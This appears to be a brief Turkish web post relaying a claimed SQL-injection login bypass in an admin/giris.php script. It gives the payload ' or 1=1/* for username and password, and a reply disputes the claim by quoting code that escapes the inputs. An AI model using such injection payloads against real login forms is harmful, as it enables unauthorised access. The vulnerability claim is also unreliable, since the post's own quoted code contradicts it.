Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################
Inject to giris.php
Exploitiez
id : ' or 1=1/*
pw : ' or 1=1/*
oldumu babacan demedin mi biri indirir scripti :S a.q adam engellemiş scripte bypassı boş bug göndermeyin inceleyin iyice :S sadece sorguya bakarak acık mevcut diyemezsin ki :S bak bakalım line 61 den aşağısına
//line 61
$isim=$_POST['isim'];
$sifre=$_POST['sifre'];
$isim=htmlspecialchars(mysql_real_escape_string($isim));
$sifre=htmlspecialchars(mysql_real_escape_string($sifre));
adam paşalar gibi önlemini almıs :S
sırf asağıda ki sorgudan yola cıkamazsın
//line 73
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
$sayi=mysql_num_rows($sorgu);
ne biliyim a.q nerdesin str0ke :S
0 yorum:
Yorum Gönder